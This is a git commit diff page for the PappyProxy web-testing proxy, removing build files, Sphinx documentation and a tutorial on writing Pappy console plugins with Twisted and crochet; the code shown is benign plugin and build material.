jab2870
/
PappyProxy
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Version 0.3.0, move large amount of code to Puppy

Browse Source
master
Rob Glew 7 years ago
parent 76d20774a5
commit f9737dbdd8
169 changed files with 6470 additions and 43869 deletions
Whitespace
Show all changes Ignore whitespace when comparing lines Ignore changes in amount of whitespace Ignore changes in whitespace at EOL
Split View
Diff Options
Show Stats Download Patch File Download Diff File
  1. 4
      .buildinfo
  2. 3
      .gitignore
  3. 3
      .gitmodules
  4. 10
      MANIFEST.in
  5. 7
      Makefile
  6. 948
      README.md
  7. 196
      docs/Makefile
  8. 4
      docs/build/html/.buildinfo
  9. 0
      docs/build/html/.nojekyll
  10. 26
      docs/build/html/_sources/index.txt
  11. 7
      docs/build/html/_sources/modules.txt
  12. 1631
      docs/build/html/_sources/overview.txt
  13. 449
      docs/build/html/_sources/pappyplugins.txt
  14. 129
      docs/build/html/_sources/pappyproxy.txt
  15. 720
      docs/build/html/_sources/tutorial.txt
  16. BIN
      docs/build/html/_static/ajax-loader.gif
  17. 599
      docs/build/html/_static/basic.css
  18. 261
      docs/build/html/_static/classic.css
  19. BIN
      docs/build/html/_static/comment-bright.png
  20. BIN
      docs/build/html/_static/comment-close.png
  21. BIN
      docs/build/html/_static/comment.png
  22. 287
      docs/build/html/_static/doctools.js
  23. BIN
      docs/build/html/_static/down-pressed.png
  24. BIN
      docs/build/html/_static/down.png
  25. BIN
      docs/build/html/_static/file.png
  26. 10308
      docs/build/html/_static/jquery-1.11.1.js
  27. 4
      docs/build/html/_static/jquery.js
  28. BIN
      docs/build/html/_static/minus.png
  29. BIN
      docs/build/html/_static/plus.png
  30. 65
      docs/build/html/_static/pygments.css
  31. 651
      docs/build/html/_static/searchtools.js
  32. 159
      docs/build/html/_static/sidebar.js
  33. 999
      docs/build/html/_static/underscore-1.3.1.js
  34. 31
      docs/build/html/_static/underscore.js
  35. BIN
      docs/build/html/_static/up-pressed.png
  36. BIN
      docs/build/html/_static/up.png
  37. 808
      docs/build/html/_static/websupport.js
  38. 863
      docs/build/html/genindex.html
  39. 180
      docs/build/html/index.html
  40. 123
      docs/build/html/modules.html
  41. BIN
      docs/build/html/objects.inv
  42. 2326
      docs/build/html/overview.html
  43. 631
      docs/build/html/pappyplugins.html
  44. 1936
      docs/build/html/pappyproxy.html
  45. 174
      docs/build/html/py-modindex.html
  46. 105
      docs/build/html/search.html
  47. 1
      docs/build/html/searchindex.js
  48. 904
      docs/build/html/tutorial.html
  49. 322
      docs/source/conf.py
  50. 43
      docs/source/contributing.rst
  51. 26
      docs/source/index.rst
  52. 7
      docs/source/modules.rst
  53. 1631
      docs/source/overview.rst
  54. 449
      docs/source/pappyplugins.rst
  55. 129
      docs/source/pappyproxy.rst
  56. 62
      docs/source/pappyproxy.schema.rst
  57. 30
      docs/source/pappyproxy.templates.rst
  58. 62
      docs/source/pappyproxy.tests.rst
  59. 22
      docs/source/pappyproxy.vim_repeater.rst
  60. 720
      docs/source/tutorial.rst
  61. 147
      install.sh
  62. 1
      pappyproxy/.coverage
  63. 3
      pappyproxy/.coveragerc
  64. 22
      pappyproxy/Makefile
  65. 1
      pappyproxy/__init__.py
  66. 7
      pappyproxy/__main__.py
  67. BIN
      pappyproxy/__pycache__/colors.cpython-35.pyc
  68. BIN
      pappyproxy/__pycache__/config.cpython-35.pyc
  69. BIN
      pappyproxy/__pycache__/console.cpython-35.pyc
  70. BIN
      pappyproxy/__pycache__/macros.cpython-35.pyc
  71. BIN
      pappyproxy/__pycache__/pap.cpython-35.pyc
  72. BIN
      pappyproxy/__pycache__/proxy.cpython-35.pyc
  73. BIN
      pappyproxy/__pycache__/util.cpython-35.pyc
  74. 386
      pappyproxy/clip.py
  75. 114
      pappyproxy/colors.py
  76. 112
      pappyproxy/comm.py
  77. 84
      pappyproxy/compress.py
  78. 398
      pappyproxy/config.py
  79. 129
      pappyproxy/console.py
  80. 799
      pappyproxy/context.py
  81. 236
      pappyproxy/crypto.py
  82. 3
      pappyproxy/default_global_config.json
  83. 9
      pappyproxy/default_user_config.json
  84. 3660
      pappyproxy/http.py
  85. BIN
      pappyproxy/interface/__pycache__/context.cpython-35.pyc
  86. BIN
      pappyproxy/interface/__pycache__/decode.cpython-35.pyc
  87. BIN
      pappyproxy/interface/__pycache__/macros.cpython-35.pyc
  88. BIN
      pappyproxy/interface/__pycache__/mangle.cpython-35.pyc
  89. BIN
      pappyproxy/interface/__pycache__/misc.cpython-35.pyc
  90. BIN
      pappyproxy/interface/__pycache__/tags.cpython-35.pyc
  91. BIN
      pappyproxy/interface/__pycache__/test.cpython-35.pyc
  92. BIN
      pappyproxy/interface/__pycache__/view.cpython-35.pyc
  93. 245
      pappyproxy/interface/context.py
  94. 157
      pappyproxy/interface/decode.py
  95. 150
      pappyproxy/interface/macros.py
  96. 325
      pappyproxy/interface/mangle.py
  97. 187
      pappyproxy/interface/misc.py
  98. 0
      pappyproxy/interface/repeater/__init__.py
  99. 1607
      pappyproxy/interface/repeater/repeater.py
  100. 0
      pappyproxy/interface/repeater/repeater.vim
  101. Some files were not shown because too many files have changed in this diff Show More

4
.buildinfo
Unescape View File

@ -1,4 +0,0 @@
# Sphinx build info version 1
# This file hashes the configuration used when building these files. When it is not found, a full rebuild will be done.
config: bbf715646cf3ecd7b0f05515e807936d
tags: 645f666f9bcd5a90fca523b33c5a78b7

3
.gitignore vendored
Unescape View File

@ -1,6 +1,4 @@
*.pyc
pappyproxy/certs/*
debug_out/*
data.db
.coverage
.cache
@ -12,3 +10,4 @@ build/*
*.egg-info/*
.#*
*notes*
*.org

3
.gitmodules vendored
Unescape View File

@ -1,3 +0,0 @@
[submodule "pappyproxy/lists/fuzzdb"]
path = pappyproxy/lists/fuzzdb
url = https://github.com/fuzzdb-project/fuzzdb.git

10
MANIFEST.in
Unescape View File

@ -1,10 +0,0 @@
include README.md
include LICENSE.txt
recursive-include pappyproxy *.json
recursive-include pappyproxy *.py
recursive-include pappyproxy *.vim
recursive-include pappyproxy *.txt
recursive-include pappyproxy *.template
recursive-include pappyproxy *.template
recursive-include pappyproxy/site *
include docs/source/overview.rst

7
Makefile
Unescape View File

@ -1,7 +0,0 @@
docs:
pandoc --from=markdown --to=rst --output=docs/source/overview.rst README.md
cd docs; make html
cd docs/build/html; touch .nojekyll
.PHONY: docs

948
README.md
View File

File diff suppressed because it is too large Load Diff

196
docs/Makefile
Unescape View File

@ -1,196 +0,0 @@
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
BUILDDIR = build
SOURCEDIR = "$(shell pwd)/source"
# User-friendly check for sphinx-build
ifeq ($(shell which $(SPHINXBUILD) >/dev/null 2>&1; echo $$?), 1)
$(error "The '$(SPHINXBUILD)' command was not found. Make sure you have Sphinx installed, then set the SPHINXBUILD environment variable to point to the full path of the '$(SPHINXBUILD)' executable. Alternatively you can add the directory with the executable to your PATH. If you don't have Sphinx installed, grab it from http://sphinx-doc.org/")
endif
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
# the i18n builder cannot share the environment and doctrees with the others
I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
.PHONY: help clean html dirhtml singlehtml pickle json htmlhelp qthelp devhelp epub latex latexpdf text man changes linkcheck doctest coverage gettext
help:
@echo "Please use \`make <target>' where <target> is one of"
@echo " html to make standalone HTML files"
@echo " dirhtml to make HTML files named index.html in directories"
@echo " singlehtml to make a single large HTML file"
@echo " pickle to make pickle files"
@echo " json to make JSON files"
@echo " htmlhelp to make HTML files and a HTML help project"
@echo " qthelp to make HTML files and a qthelp project"
@echo " applehelp to make an Apple Help Book"
@echo " devhelp to make HTML files and a Devhelp project"
@echo " epub to make an epub"
@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
@echo " latexpdf to make LaTeX files and run them through pdflatex"
@echo " latexpdfja to make LaTeX files and run them through platex/dvipdfmx"
@echo " text to make text files"
@echo " man to make manual pages"
@echo " texinfo to make Texinfo files"
@echo " info to make Texinfo files and run them through makeinfo"
@echo " gettext to make PO message catalogs"
@echo " changes to make an overview of all changed/added/deprecated items"
@echo " xml to make Docutils-native XML files"
@echo " pseudoxml to make pseudoxml-XML files for display purposes"
@echo " linkcheck to check all external links for integrity"
@echo " doctest to run all doctests embedded in the documentation (if enabled)"
@echo " coverage to run coverage check of the documentation (if enabled)"
clean:
rm -rf $(BUILDDIR)/*
html:
$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html
@echo
@echo "Build finished. The HTML pages are in $(BUILDDIR)/html."
dirhtml:
$(SPHINXBUILD) -b dirhtml $(ALLSPHINXOPTS) $(BUILDDIR)/dirhtml
@echo
@echo "Build finished. The HTML pages are in $(BUILDDIR)/dirhtml."
singlehtml:
$(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml
@echo
@echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml."
pickle:
$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) $(BUILDDIR)/pickle
@echo
@echo "Build finished; now you can process the pickle files."
json:
$(SPHINXBUILD) -b json $(ALLSPHINXOPTS) $(BUILDDIR)/json
@echo
@echo "Build finished; now you can process the JSON files."
htmlhelp:
$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) $(BUILDDIR)/htmlhelp
@echo
@echo "Build finished; now you can run HTML Help Workshop with the" \
".hhp project file in $(BUILDDIR)/htmlhelp."
qthelp:
$(SPHINXBUILD) -b qthelp $(ALLSPHINXOPTS) $(BUILDDIR)/qthelp
@echo
@echo "Build finished; now you can run "qcollectiongenerator" with the" \
".qhcp project file in $(BUILDDIR)/qthelp, like this:"
@echo "# qcollectiongenerator $(BUILDDIR)/qthelp/PappyProxy.qhcp"
@echo "To view the help file:"
@echo "# assistant -collectionFile $(BUILDDIR)/qthelp/PappyProxy.qhc"
applehelp:
$(SPHINXBUILD) -b applehelp $(ALLSPHINXOPTS) $(BUILDDIR)/applehelp
@echo
@echo "Build finished. The help book is in $(BUILDDIR)/applehelp."
@echo "N.B. You won't be able to view it unless you put it in" \
"~/Library/Documentation/Help or install it in your application" \
"bundle."
devhelp:
$(SPHINXBUILD) -b devhelp $(ALLSPHINXOPTS) $(BUILDDIR)/devhelp
@echo
@echo "Build finished."
@echo "To view the help file:"
@echo "# mkdir -p $$HOME/.local/share/devhelp/PappyProxy"
@echo "# ln -s $(BUILDDIR)/devhelp $$HOME/.local/share/devhelp/PappyProxy"
@echo "# devhelp"
epub:
$(SPHINXBUILD) -b epub $(ALLSPHINXOPTS) $(BUILDDIR)/epub
@echo
@echo "Build finished. The epub file is in $(BUILDDIR)/epub."
latex:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo
@echo "Build finished; the LaTeX files are in $(BUILDDIR)/latex."
@echo "Run \`make' in that directory to run these through (pdf)latex" \
"(use \`make latexpdf' here to do that automatically)."
latexpdf:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo "Running LaTeX files through pdflatex..."
$(MAKE) -C $(BUILDDIR)/latex all-pdf
@echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
latexpdfja:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo "Running LaTeX files through platex and dvipdfmx..."
$(MAKE) -C $(BUILDDIR)/latex all-pdf-ja
@echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
text:
$(SPHINXBUILD) -b text $(ALLSPHINXOPTS) $(BUILDDIR)/text
@echo
@echo "Build finished. The text files are in $(BUILDDIR)/text."
man:
$(SPHINXBUILD) -b man $(ALLSPHINXOPTS) $(BUILDDIR)/man
@echo
@echo "Build finished. The manual pages are in $(BUILDDIR)/man."
texinfo:
$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
@echo
@echo "Build finished. The Texinfo files are in $(BUILDDIR)/texinfo."
@echo "Run \`make' in that directory to run these through makeinfo" \
"(use \`make info' here to do that automatically)."
info:
$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
@echo "Running Texinfo files through makeinfo..."
make -C $(BUILDDIR)/texinfo info
@echo "makeinfo finished; the Info files are in $(BUILDDIR)/texinfo."
gettext:
$(SPHINXBUILD) -b gettext $(I18NSPHINXOPTS) $(BUILDDIR)/locale
@echo
@echo "Build finished. The message catalogs are in $(BUILDDIR)/locale."
changes:
$(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) $(BUILDDIR)/changes
@echo
@echo "The overview file is in $(BUILDDIR)/changes."
linkcheck:
$(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) $(BUILDDIR)/linkcheck
@echo
@echo "Link check complete; look for any errors in the above output " \
"or in $(BUILDDIR)/linkcheck/output.txt."
doctest:
$(SPHINXBUILD) -b doctest $(ALLSPHINXOPTS) $(BUILDDIR)/doctest
@echo "Testing of doctests in the sources finished, look at the " \
"results in $(BUILDDIR)/doctest/output.txt."
coverage:
$(SPHINXBUILD) -b coverage $(ALLSPHINXOPTS) $(BUILDDIR)/coverage
@echo "Testing of coverage in the sources finished, look at the " \
"results in $(BUILDDIR)/coverage/python.txt."
xml:
$(SPHINXBUILD) -b xml $(ALLSPHINXOPTS) $(BUILDDIR)/xml
@echo
@echo "Build finished. The XML files are in $(BUILDDIR)/xml."
pseudoxml:
$(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml
@echo
@echo "Build finished. The pseudo-XML files are in $(BUILDDIR)/pseudoxml."
rst:
sphinx-apidoc -f -o ./source ../pappyproxy

4
docs/build/html/.buildinfo vendored
Unescape View File

@ -1,4 +0,0 @@
# Sphinx build info version 1
# This file hashes the configuration used when building these files. When it is not found, a full rebuild will be done.
config: acf4b28924e7be348c4339aeb8b5e3ae
tags: 645f666f9bcd5a90fca523b33c5a78b7

0
docs/build/html/.nojekyll vendored
Unescape View File

26
docs/build/html/_sources/index.txt vendored
Unescape View File

@ -1,26 +0,0 @@
.. Pappy Proxy documentation master file, created by
sphinx-quickstart on Sat Dec 12 11:17:09 2015.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to Pappy Proxy's documentation!
=======================================
Contents:
.. toctree::
:maxdepth: 2
overview
tutorial
pappyplugins
contributing
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`

7
docs/build/html/_sources/modules.txt vendored
Unescape View File

@ -1,7 +0,0 @@
pappyproxy
==========
.. toctree::
:maxdepth: 4
pappyproxy

1631
docs/build/html/_sources/overview.txt vendored
View File

File diff suppressed because it is too large Load Diff

449
docs/build/html/_sources/pappyplugins.txt vendored
Unescape View File

@ -1,449 +0,0 @@
Writing Plugins for the Pappy Proxy
***********************************
.. contents:: Table of Contents
:local:
Introduction
============
Are macros not powerful enough? Want to make something reusable? Want to add console commands?! Then you might want to write yourself a plugin. Some quick highlights about plugins:
* Python scripts stored in ``~/.pappy/plugins``
* Can add console commands
* For actions which aren't specific to one project
* Harder to write than macros
Since macros can also use the plugin API, plugins aren't any more powerful than macros (besides adding console commands). However, if you find yourself copying a useful macro to more than one project, it may be worth it to just bind it to some commands, put the script in one place, and stop worrying about copying it around. Plus then you can put it on GitHub for some sweet sweet nerd cred.
Should I Write a Plugin or a Macro?
-----------------------------------
A lot of the time, you can get away with writing a macro. However, you may consider writing a plugin if:
* You find yourself copying one macro to multiple projects
* You want to write a general tool that can be applied to any website
* You need to maintain state during the Pappy session
My guess is that if you need one quick thing for a project, you're better off writing a macro first and seeing if you end up using it in future projects. Then if you find yourself needing it a lot, write a plugin for it. You may also consider keeping a ``mine.py`` plugin where you can write out commands that you use regularly but may not be worth creating a dedicated plugin for.
Plugins Get Merged
------------------
If you write a useful plugin, as long as it isn't uber niche, I'll try and merge it into the core project.
Creating a Plugin
=================
Whenever you make a macro, you'll have to bind some functions to some console commands. To do this, you'll have to define a ``load_cmds`` function in your plugin. This function should take one argument. When the plugin is loaded, this function will be called and the console object will be passed to this function. You can then use ``set_cmds`` and ``add_aliases`` to bind functions to console commands.
Writing a Hello World Plugin
----------------------------
It's probably easiest to explain how to write a plugin by writing one. Here is a simple plugin that defines a ``hello`` command and gives an alias ``hlo`` (we'll go over all the parts in a second)::
## hello.py
def hello_world(line):
print "Hello, world!"
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, None),
})
cmd.add_aliases([
('hello', 'hlo'),
])
Save this as ``~/.pappy/plugins/hello.py`` and run Pappy. You should have a new ``hello`` command that prints your message::
$ cp hello.py ~/.pappy/plugins/
$ pappy -l
Temporary datafile is /tmp/tmp1Myw6q
Proxy is listening on port 8000
pappy> hello
Hello, world!
pappy> hlo
Hello, world!
pappy>
Awesome! So let's go over the code. Here are the important parts of the code:
* We define a function that we want to call
* We define ``load_cmds(cmd)`` to be called when our plugin is loaded to bind our function to a command
* We use ``cmd.set_cmds`` to set all our commands
* We use ``cmd.add_aliases`` to add aliases for commands
Now let's go over it in detail
Passing Arguments to Your Function
----------------------------------
Each command gets bound to one function which takes one argument. That argument is all the text that was entered after the name of the command in the console. For example if we run ``hello foo bar``, in our function line would be "foo bar". **I suggest using shlex.split(line) to parse multiple arguments**. So let's update our script to take some arguments::
## hello.py
import shlex
def hello_world(line):
if line:
args = shlex.split(line)
print 'Hello, %s!' % (', '.join(args))
else:
print "Hello, world!"
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, None),
})
cmd.add_aliases([
('hello', 'hlo'),
])
Save your changes and restart pappy to reload the plugin::
$ pappy -l
Temporary datafile is /tmp/tmpBOXyJ3
Proxy is listening on port 8000
pappy> hello
Hello, world!
pappy> hello foo bar baz
Hello, foo, bar, baz!
pappy> hello foo bar "baz lihtyur"
Hello, foo, bar, baz lihtyur!
pappy>
Adding More Aliases
-------------------
So now let's add some more aliases to our command. If we want to add a new alias, we just add another tuple to the list passed into ``cmd.add_aliases``. The first element is the real name of the command (what you set with ``set_cmds``) and the second value is the alias you want to type. So let's make it so we can just type ``ho`` to say hello::
## hello.py
import shlex
def hello_world(line):
if line:
args = shlex.split(line)
print 'Hello, %s!' % (', '.join(args))
else:
print "Hello, world!"
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, None),
})
cmd.add_aliases([
('hello', 'hlo'),
('hello', 'ho'),
])
.. note::
You must use the actual name of the command that you used in ``set_cmds``. You can't "chain" alieases. As a result, in our example we couldn't add the alias ``('hlo', 'ho')`` to add ``ho`` as our alias.
Then reload the plugin::
$ pappy -l
Temporary datafile is /tmp/tmpBOXyJ3
Proxy is listening on port 8000
pappy> ho
Hello, world!
pappy> ho foo bar baz
Hello, foo, bar, baz!
pappy> ho foo bar "baz lihtyur"
Hello, foo, bar, baz lihtyur!
pappy>
Adding Another Command
----------------------
So now let's add a ``robe_and_wizard_hat`` command. To do this, we will define another function, then add another entry in the dict that is passed to ``set_cmds``. The second value in the tuple is the autocomplete function, but we'll get to that later. For now, just put in ``None`` to say we don't have one. We will also add a ``wh`` alias to it::
$ pappy -l
Temporary datafile is /tmp/tmpyl2cEZ
Proxy is listening on port 8000
pappy> wh
I put on my robe and wizard hat
pappy>
Adding Autocompletion
---------------------
You can also define a function to handle autocompletion for your command. In order to do this, you define a function that takes 4 arguments: ``text``, ``line``, ``begidx``, and ``endidx``. From the `Cmd docs <https://docs.python.org/2/library/cmd.html>`_, this is what the arguments mean:
``text`` is the string prefix we are attempting to match: all returned matches must begin with it. ``line`` is the current input line with leading whitespace removed, ``begidx`` and ``endidx`` are the beginning and ending indexes of the prefix text, which could be used to provide different completion depending upon which position the argument is in.
Let's let the user to autocomplete some names in our plugin::
import shlex
_AUTOCOMPLETE_NAMES = ['alice', 'allie', 'sarah', 'mallory', 'slagathor']
def hello_world(line):
if line:
args = shlex.split(line)
print 'Hello, %s!' % (', '.join(args))
else:
print "Hello, world!"
def put_on_rope_and_wizard_hat(line):
if line:
print '%s puts on their robe and wizard hat' % line
else:
print 'I put on my robe and wizard hat'
def complete_hello_world(text, line, begidx, endidx):
return [n for n in _AUTOCOMPLETE_NAMES if n.startswith(text)]
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, complete_hello_world),
'wizard_hat': (put_on_rope_and_wizard_hat, None),
})
cmd.add_aliases([
('hello', 'hlo'),
('wizard_hat', 'wh'),
])
Then restart and run::
$ pappy -l
Temporary datafile is /tmp/tmp3J97rE
Proxy is listening on port 8000
pappy> hello
alice allie mallory sarah slagathor
pappy> hello allie
Hello, allie!
pappy>
You can't see it, but I hit tab twice after typing hello to get the completions to appear.
Adding Help
-----------
Now let's say we want to add some help to the command so that when the user runs ``help hello`` they get something useful. To do that, just add a docstring to your function::
import shlex
_AUTOCOMPLETE_NAMES = ['alice', 'allie', 'sarah', 'mallory', 'slagathor']
def hello_world(line):
"""
Say hello to the world. Usage: hello [name]
"""
if line:
args = shlex.split(line)
print 'Hello, %s!' % (', '.join(args))
else:
print "Hello, world!"
def put_on_rope_and_wizard_hat(line):
if line:
print '%s puts on their robe and wizard hat' % line
else:
print 'I put on my robe and wizard hat'
def complete_hello_world(text, line, begidx, endidx):
return [n for n in _AUTOCOMPLETE_NAMES if n.startswith(text)]
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, complete_hello_world),
'wizard_hat': (put_on_rope_and_wizard_hat, None),
})
cmd.add_aliases([
('hello', 'hlo'),
('wizard_hat', 'wh'),
])
Using defer.inlineCallbacks With a Command
------------------------------------------
.. note::
If you are using inlineCallbacks, you can't use any functions which are blocking versions of async functions. For example, you cannot use :func:`pappyproxy.http.Request.save` and must instead use :func:`pappyproxy.http.Request.async_deep_save`.
.. note::
This tutorial won't tell you how to use inlineCallbacks in general. Type "twisted inline callbacks" into google to figure out what they are. This is mainly just a reminder to use the ``crochet`` wrapper for console commands and warning you that some functions may return deferreds that you may have to deal with.
Since you're writing a plugin, you'll probably be using functions which return a deferred. And to keep things readable, you'll want to use the ``defer.inlineCallbacks`` function wrapper. Unfortunately, you can't bind async functions to commands. Luckily, there's a library called `crochet <https://pypi.python.org/pypi/crochet>`_ which lets you add another wrapper to the function that lets it be used like a blocking function. Rather than talking about it, let's write a plugin to call :func:`pappyproxy.util.load_reqlist` to print out some requests' hosts. Let's start by pretending it's a normal function::
import shlex
from pappyproxy.util import load_reqlist
def print_hosts(line):
args = shlex.split(line)
reqs = load_reqlist(args[0]) # It's supposed to return a list of requests, right?
for r in reqs:
print 'The host for request %s is: %s' % (r.reqid, r.host)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'print_hosts': (print_hosts, None),
})
cmd.add_aliases([
])
And we run it::
pappy> print_hosts 1
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/cmd2.py", line 788, in onecmd_plus_hooks
stop = self.onecmd(statement)
File "/usr/local/lib/python2.7/dist-packages/cmd2.py", line 871, in onecmd
stop = func(statement)
File "/home/supahacker/pappy/pappyproxy/console.py", line 15, in catch
func(*args, **kwargs)
File "/home/supahacker/.pappy/plugins/hosts.py", line 7, in print_hosts
for r in reqs:
TypeError: iteration over non-sequence
iteration over non-sequence
pappy>
Iteration over a non-sequence? what? Well, :func:`pappyproxy.util.load_reqlist` doesn't actually return a list of requests. It returns a deferred which returns a list of requests. I'm not going into the details (look up some stuff on using inline callbacks with Twisted if you want more info), but the way to fix it is to slap an ``inlineCallbacks`` wrapper on the function and ``yield`` the result of the function. Now it looks like this::
import shlex
from pappyproxy.util import load_reqlist
from twisted.internet import defer
@defer.inlineCallbacks
def print_hosts(line):
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
for r in reqs:
print 'The host for request %s is: %s' % (r.reqid, r.host)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'print_hosts': (print_hosts, None),
})
cmd.add_aliases([
])
However, the console assumes that any functions it calls will be blocking. As a result, we need to add the ``crochet.wait_for`` wrapper::
import shlex
import crochet
from pappyproxy.util import load_reqlist
from twisted.internet import defer
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def print_hosts(line):
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
for r in reqs:
print 'The host for request %s is: %s' % (r.reqid, r.host)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'print_hosts': (print_hosts, None),
})
cmd.add_aliases([
])
And now we're good! If you run it without the crochet wrapper, it may still work. However, since the console assumes any functions it calls will be blocking, not having the wrapper could lead to weird errors.
Plugin API
==========
There are also some useful functions that you can use to interact with the request history and the context. It's somewhat limited for now, but for now you can at least look through history and create/send new requests. Hopefully the API will expand as people find themselves wanting to do new things. That means **if you're writing a plugin, let me know and I'll add any APIs you need**. For now at least, plugins will let you maintain state over the course of the session and let you define commands.
The best way to learn what you can do is to go through the :ref:`pappyproxy-package` and look at all the available functions.
API Functions
-------------
See :mod:`pappyproxy.plugin` for docs on all the functions you can use. You can also use any of the functions provided for writing macros (and vice-versa).
Storing Data on Disk
--------------------
Unfortunately, you're on your own if you want to store plugin specific stuff on disk. It's also important that you store any data that is specific to a project in the same directory as the data file. This is to make sure that if you encrypt your project folder, you can be sure that no sensitive data about the test can be found anywhere else. The only time you should store anything outside of the current directory is to store global plugin settings, and even then it would probably be better to parse options from ``config.config_dict``. Pappy doesn't even store data outside of the project directory except for its CA certificates.
However, if your plugin is a special snowflake that needs to store unencrypted, global settings, you should create a directory for your plugin in ``{config.DATA_DIR}/plugindata`` and put your files there. But again, avoid this if you can.
.. note::
Any project-specific data (ie anything that contains info about requests) should be stored in the project directory unless you have a really really good reason. This is because it must be possible to secure any sensitive data by encrypting the project folder and storing data outside of the directory will add complications.
.. warning::
Do not modify the data file schema. There is a good chance the schema will break in future versions of Pappy.
Storing Custom Request Metadata
-------------------------------
:class:`pappyproxy.http.Request` objects have a ``plugin_data`` attribute. It is a dictionary that is intended to be used by plugins to give the request custom metadata. If you want to store metadata about a request, it is suggested that you add a key to this dictionary and store any metadata you want under that key. You can use :func:`pappyproxy.http.Request.get_plugin_dict` to get a dictionary for a specific name. It will create an entry for that name if it doesn't exist. I also suggest defining a function plugin-wide for getting the plugin's data dict from a specific request. Since dictionaries are always passed by reference, any modifications you make to the returned dict will be applied to the request as well.
.. note::
You will need to save the request using something like :func:`pappyproxy.http.Request.save` or :func:`pappyproxy.http.Request.async_deep_save` in order to store the changes in the data file.
Here is an example plugin for storing the user-agent (if it exists) in the ``plugin_data`` dict of a request under the key ``agent``::
import crochet
import shlex
from twisted.internet import defer
from pappyproxy.util import load_reqlist
from pappyproxy.plugin import main_context
from pappyproxy.util import PappyException
DATA_KEY = 'agent'
def get_data(r):
return r.get_plugin_dict(DATA_KEY)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def update_agent_metadata(line):
for r in main_context().active_requests:
if 'user-agent' in r.headers:
get_data(r)['agent'] = r.headers['user-agent']
yield r.async_deep_save()
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_agent(line):
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
for r in reqs:
if 'agent' in get_data(r):
print 'The user agent for %s is "%s"' % (r.reqid, get_data(r)['agent'])
else:
print 'Request %s has no user agent data' % r.reqid
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'agent_update': (update_agent_metadata, None),
'view_agent': (view_agent, None),
})
cmd.add_aliases([
])
Useful Functions
----------------
See :mod:`pappyproxy.plugin` and :mod:`pappyproxy.util` for useful functions
Built In Plugins As Examples
============================
Built In Plugins
----------------
All the commands in Pappy are implemented as plugins. I have done what I could to avoid using internal functions as much as I could, but there are still some instances where I had to implement an internal function in order to get the functions I needed. However, you can still look them over to see how things are structured and see some examples of semi-complicated plugins.
Interceptor and Repeater
------------------------
Pappy's interceptor and repeater are fully implemented as a plugin. It defines an intercepting macro that handles saving then editing messages and commands that read those files and edit them. It relies on Twisted to switch between the macro handling the request and the command modifying it, so if you want to make something similar, you'll have to learn how to use deferreds.

129
docs/build/html/_sources/pappyproxy.txt vendored
Unescape View File

@ -1,129 +0,0 @@
pappyproxy package
==================
Subpackages
-----------
.. toctree::
pappyproxy.plugins
pappyproxy.schema
pappyproxy.templates
pappyproxy.tests
pappyproxy.vim_repeater
Submodules
----------
pappyproxy.comm module
----------------------
.. automodule:: pappyproxy.comm
:members:
:undoc-members:
:show-inheritance:
pappyproxy.config module
------------------------
.. automodule:: pappyproxy.config
:members:
:undoc-members:
:show-inheritance:
pappyproxy.console module
-------------------------
.. automodule:: pappyproxy.console
:members:
:undoc-members:
:show-inheritance:
pappyproxy.context module
-------------------------
.. automodule:: pappyproxy.context
:members:
:undoc-members:
:show-inheritance:
pappyproxy.http module
----------------------
.. automodule:: pappyproxy.http
:members:
:undoc-members:
:show-inheritance:
pappyproxy.iter module
----------------------
.. automodule:: pappyproxy.iter
:members:
:undoc-members:
:show-inheritance:
pappyproxy.macros module
------------------------
.. automodule:: pappyproxy.macros
:members:
:undoc-members:
:show-inheritance:
pappyproxy.pappy module
-----------------------
.. automodule:: pappyproxy.pappy
:members:
:undoc-members:
:show-inheritance:
pappyproxy.plugin module
------------------------
.. automodule:: pappyproxy.plugin
:members:
:undoc-members:
:show-inheritance:
pappyproxy.proxy module
-----------------------
